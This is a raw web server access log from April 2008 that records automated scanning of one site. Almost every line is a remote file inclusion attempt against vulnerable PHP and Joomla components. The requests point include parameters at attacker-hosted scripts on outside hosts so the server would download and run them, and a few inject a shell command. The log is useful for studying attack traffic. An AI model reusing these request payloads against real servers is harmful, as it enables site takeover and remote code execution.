193.164.131.35 - - [10/Apr/2008:09:05:38 -0700] "GET /logs/access_080321.log//index.php?option=com_poll&task=results&id=14&mosConfig_absolute_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.164.131.35 - - [10/Apr/2008:09:05:41 -0700] "GET /logs/access_080313.log//index.php?option=com_poll&task=results&id=14&mosConfig_absolute_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:05:41 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [10/Apr/2008:09:05:52 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:06:05 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:06:06 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:09:06:08 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
147.156.161.91 - - [10/Apr/2008:09:06:09 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.156.161.91 - - [10/Apr/2008:09:06:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.156.161.91 - - [10/Apr/2008:09:06:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:06:22 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:06:24 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:06:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.53.24.188 - - [10/Apr/2008:09:06:34 -0700] "GET /logs/access_071220.log/clarolinepath%5D/learnPath/include/scormExport.inc.php?includePath=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.24.188 - - [10/Apr/2008:09:06:35 -0700] "GET /clarolinepath%5D/learnPath/include/scormExport.inc.php?includePath=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.24.188 - - [10/Apr/2008:09:06:35 -0700] "GET /logs/clarolinepath%5D/learnPath/include/scormExport.inc.php?includePath=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.20.46.121 - - [10/Apr/2008:09:06:50 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mysticmysfits.com/smf/avatars/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [10/Apr/2008:09:06:50 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mysticmysfits.com/smf/avatars/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.20.46.121 - - [10/Apr/2008:09:06:50 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mysticmysfits.com/smf/avatars/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.221.88.99 - - [10/Apr/2008:09:06:55 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.221.88.99 - - [10/Apr/2008:09:06:56 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.156.161.91 - - [10/Apr/2008:09:07:00 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:09:07:06 -0700] "GET /logs/access.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:07:37 -0700] "GET /logs/access_080308.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:07:39 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:07:39 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:07:40 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.10.128.138 - - [10/Apr/2008:09:08:15 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:09:08:34 -0700] "GET /logs/access.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:09:08:36 -0700] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:08:43 -0700] "GET /logs/access_080308.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:09:08:43 -0700] "GET /logs/access_080401.log/default.php?page=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [10/Apr/2008:09:08:44 -0700] "GET /logs/default.php?page=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:09:08:51 -0700] "GET /default.php?page=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.116.174.9 - - [10/Apr/2008:09:09:42 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/reyen/file/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.164.131.35 - - [10/Apr/2008:09:10:01 -0700] "GET /logs/access_080207.log//index.php?option=com_poll&task=results&id=14&mosConfig_absolute_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.65.191 - - [10/Apr/2008:09:10:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:10:38 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.221.88.99 - - [10/Apr/2008:09:10:56 -0700] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:11:01 -0700] "GET /logs/access_080401.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:09:11:17 -0700] "GET /logs/access.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:09:11:19 -0700] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.116.14.99 - - [10/Apr/2008:09:11:28 -0700] "GET /logs/access_080215.log/index.php?x=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.116.14.99 - - [10/Apr/2008:09:11:30 -0700] "GET /index.php?x=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
201.116.14.99 - - [10/Apr/2008:09:11:30 -0700] "GET /logs/index.php?x=http://www.mitumaco.com/alex2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:11:35 -0700] "GET //mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:11:35 -0700] "GET /logs//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
209.216.209.45 - - [10/Apr/2008:09:11:44 -0700] "GET /logs/access_080218.log/modify.php?dir_module=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [10/Apr/2008:09:11:44 -0700] "GET /modify.php?dir_module=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [10/Apr/2008:09:11:44 -0700] "GET /logs/modify.php?dir_module=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.20.46.121 - - [10/Apr/2008:09:11:56 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mysticmysfits.com/smf/avatars/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.162.213 - - [10/Apr/2008:09:12:34 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.162.213 - - [10/Apr/2008:09:12:34 -0700] "GET /logs//index.php?pagina=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:09:12:48 -0700] "GET /logs/access_080401.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.28.163 - - [10/Apr/2008:09:12:54 -0700] "GET //main.php?sayfa=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [10/Apr/2008:09:13:00 -0700] "GET //main.php?sayfa=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.209.45 - - [10/Apr/2008:09:13:05 -0700] "GET /logs/access_071225.log/mosConfig_live_site=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [10/Apr/2008:09:13:05 -0700] "GET /mosConfig_live_site=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [10/Apr/2008:09:13:05 -0700] "GET /logs/mosConfig_live_site=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.209.45 - - [10/Apr/2008:09:13:15 -0700] "GET /logs/access_080211.log/mosConfig_live_site=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.81.87 - - [10/Apr/2008:09:13:25 -0700] "GET /logs/access_080118.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.youwilllistentowhatwesay.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:29 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:29 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:29 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:13:33 -0700] "GET /logs/access_080223.log/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=SHELL%20CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:13:33 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=SHELL%20CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:13:33 -0700] "GET /logs/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=SHELL%20CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:38 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:38 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:38 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:49 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:49 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:50 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:55 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:13:56 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.144.75 - - [10/Apr/2008:09:14:01 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.sustainaqua.org//spread.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:14:11 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:14:11 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:14:12 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:14:26 -0700] "GET /logs/access_080308.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:14:27 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:14:27 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.68.203.22 - - [10/Apr/2008:09:14:39 -0700] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.100.222 - - [10/Apr/2008:09:14:56 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.245 - - [10/Apr/2008:09:15:02 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
66.230.197.245 - - [10/Apr/2008:09:15:02 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:09:15:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:15:27 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:09:15:27 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:15:28 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:15:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:16:02 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:16:02 -0700] "GET //main.php?sayfa=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:09:16:02 -0700] "GET /logs//main.php?sayfa=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:09:16:13 -0700] "GET /logs/access_080211.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:09:16:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:16:13 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:09:16:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:09:16:15 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
84.243.253.159 - - [10/Apr/2008:09:16:17 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:09:16:22 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:09:16:22 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:09:16:23 -0700] "GET /logs/access_080211.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:09:16:27 -0700] "GET /logs/access_080126.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:09:16:34 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
